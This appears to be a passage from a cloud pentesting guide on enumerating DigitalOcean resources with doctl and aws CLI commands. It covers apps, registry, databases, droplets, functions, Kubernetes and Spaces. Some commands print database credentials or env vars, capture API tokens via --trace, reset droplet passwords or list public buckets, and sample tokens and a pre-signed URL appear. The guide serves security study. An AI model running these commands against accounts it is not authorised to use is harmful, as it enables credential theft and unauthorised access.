You can run code directly from GitHub, GitLab, Docker Hub, the DO container registry (or a sample app).
When defining an env var you can set it as encrypted. The only way to retrieve its value is to execute commands inside the host running the app.
Enumeration
Accessing the app's console from the DO web panel will give you a shell, and just executing env you will be able to see all the env vars (including the ones defined as encrypted).
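A minimal enumeration sketch with doctl (assuming the standard apps subcommands; <app-id> is a placeholder):
# List the apps of the team
doctl apps list
# Dump the spec of an app (may reveal env var names, source repos...)
doctl apps spec get <app-id>
# Read the runtime logs of an app
doctl apps logs <app-id>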
Connection
# Using doctl
doctl registry login
Enumeration
# Get creds to access the registry from the API
doctl registry docker-config
# List
doctl registry repository list-v2
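With the docker credentials configured it should then be possible to pull the stored images directly (a sketch; registry and repository names are placeholders):
# Pull an image from the DO container registry
docker pull registry.digitalocean.com/<registry-name>/<repository>:<tag>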
Connections details
When creating a database you can select to configure it accessible from a
public network, or just from inside a VPC. Moreover, it request you to
whitelist IPs that can access it (your IPv4 can be one).
The host, port, dbname, username, and password are shown in the
console. You can even download the AD certificate to connect securely.
{% code overflow="wrap" %}
psql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060
Enumeration
# Database clusters
doctl databases list
# Auth
doctl databases get <db-id> # This shows the URL with CREDENTIALS to access
doctl databases connection <db-id> # Another way to get credentials
doctl databases user list <db-id> # Get all usernames and passwords
# Backups
doctl databases backups <db-id> # List backups of DB
# Pools
doctl databases pool list <db-id> # List pools of DB
You can select from common OSs to applications already running (such as WordPress, cPanel, Laravel...), or even upload and use your own images.
Snapshots can be used to create new Droplets with the same configuration
as the original Droplet, or to restore a Droplet to the state it was in when the
snapshot was taken. Snapshots are stored on DigitalOcean's object storage
service, and they are incremental, meaning that only the changes since the
last snapshot are stored. This makes them efficient to use and cost-effective
to store.
On the other hand, a backup is a complete copy of a Droplet, including the
operating system, installed applications, files, and data, as well as the
Droplet's settings and metadata. Backups are typically performed on a
regular schedule, and they capture the entire state of a Droplet at a specific
point in time.
Authentication
For authentication it's possible to enable SSH with a username and password (the password is defined when the droplet is created), or to select one or more of the uploaded SSH keys.
Firewall
By default droplets are created WITHOUT A FIREWALL (unlike in other clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to create a firewall and attach it.
do-networking.md
Enumeration
# VMs
doctl compute droplet list # IPs will appear here
doctl compute droplet backups <droplet-id>
doctl compute droplet snapshots <droplet-id>
doctl compute droplet neighbors <droplet-id> # Get network neighbors
doctl compute droplet actions <droplet-id> # Get droplet actions
# VM interesting actions
doctl compute droplet-action password-reset <droplet-id> # New password is emailed to the user
doctl compute droplet-action enable-ipv6 <droplet-id>
doctl compute droplet-action power-on <droplet-id>
doctl compute droplet-action disable-backups <droplet-id>
# SSH
doctl compute ssh <droplet-id> # This will just run SSH
doctl compute ssh-key list
doctl compute ssh-key import <key-name> --public-key-file /path/to/key.pub
# Certificates
doctl compute certificate list
# Snapshots
doctl compute snapshot list
RCE
With access to the console it's possible to get a shell inside the droplet by accessing the URL:
https://cloud.digitalocean.com/droplets/<droplet-id>/terminal/ui/
It's also possible to launch a recovery console to run commands inside the host by accessing https://cloud.digitalocean.com/droplets/<droplet-id>/console (but in this case you will need to know the root password).
In DO, to create a function you first need to create a namespace, which groups functions.\ Inside the namespace you can then create a function.
Triggers
The way to trigger a function via the REST API (always enabled, it's the method the cli uses) is by sending a request with an authentication token like:
curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
-H "Content-Type: application/json" \
-H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
To see how the doctl cli tool gets this token (so you can replicate it), the following command shows the complete network trace:
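A minimal sketch using doctl's global --trace flag, which prints the HTTP requests (including the Authorization header) that doctl performs; the chosen subcommand is just an example:
# Any serverless subcommand run with --trace dumps the API calls and the auth token
doctl serverless activations list --trace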
Enumeration
# Namespace
doctl serverless namespaces list
# Logs of executions
doctl serverless activations list
doctl serverless activations get <activation-id> # Get all the info about the execution
doctl serverless activations logs <activation-id> # Get only the logs of the execution
doctl serverless activations result <activation-id> # Get only the response result of the execution
# I couldn't find any way to get the env variables from the CLI
When you create a new Droplet on DigitalOcean, you can choose an Image
to use as the basis for the Droplet. This will automatically install the
operating system and any pre-installed applications on the new Droplet, so
you can start using it right away. Images can also be used to create
snapshots and backups of your Droplets, so you can easily create new
Droplets from the same configuration in the future.
Enumeration
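A minimal sketch with doctl (assuming the standard image subcommands):
# List available images
doctl compute image list
# List only the custom images uploaded by the user
doctl compute image list-user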
Connection
# Use a kubeconfig file that you can download from the console
kubectl --kubeconfig=/<pathtodirectory>/k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes
Enumeration
# Get clusters
doctl kubernetes cluster list
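The kubeconfig and node pools can also be retrieved with doctl (a sketch; <cluster-id> is a placeholder):
# Download and merge the kubeconfig of a cluster into ~/.kube/config
doctl kubernetes cluster kubeconfig save <cluster-id>
# List the node pools of a cluster
doctl kubernetes cluster node-pool list <cluster-id>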
Domains
Reserved IPs
Load Balancers
VPC
doctl vpcs list
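The other networking objects can be enumerated in a similar way (a minimal sketch using standard doctl subcommands):
# Domains and their DNS records
doctl compute domain list
doctl compute domain records list <domain>
# Reserved IPs (called floating IPs in older doctl versions)
doctl compute reserved-ip list
# Load balancers
doctl compute load-balancer list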
Firewall
By default droplets are created WITHOUT A FIREWALL (unlike in other clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to create a firewall and attach it.
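Existing firewalls and the rules/droplets they are attached to can be listed with doctl (a minimal sketch):
# List firewalls, their rules and the droplets they protect
doctl compute firewall list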
do-basic-information.md
Enumeration
It's possible to enumerate all the projects a user has access to and all the resources that are running inside a project very easily:
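A minimal sketch of that enumeration with doctl (assuming the standard projects subcommands; <project-id> is a placeholder):
# List all projects
doctl projects list
# List the resources (droplets, spaces, databases...) inside a project
doctl projects resources list <project-id>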
Access
Spaces can be public (anyone can access them from the Internet) or private
(only authorised users). To access the files from a private space outside of
the Control Panel, we need to generate an access key and secret. These are
a pair of random tokens that serve as a username and password to grant
access to your Space.
Even if the space is public, files inside of it can be private (you will be
able to access them only with credentials).
However, even if the file is private, from the console it's possible to share it with a pre-signed link such as:
https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115d
Enumeration
# Unauthenticated
## Note how the region is specified in the endpoint
aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname
# Authenticated
## Configure spaces keys as AWS credentials
aws configure
AWS Access Key ID [None]: <spaces_key>
AWS Secret Access Key [None]: <Secret>
Default region name [None]:
Default output format [None]:
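Once the Spaces key is configured, the bucket can be accessed with the regular aws s3 commands against the Spaces endpoint (a sketch reusing the example bucket name from above):
# Authenticated listing and download
aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname
aws s3 cp --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname/filename ./filename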
Enumeration
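For Volumes (block storage), a minimal doctl enumeration sketch:
# List block storage volumes (output includes the droplets they are attached to)
doctl compute volume list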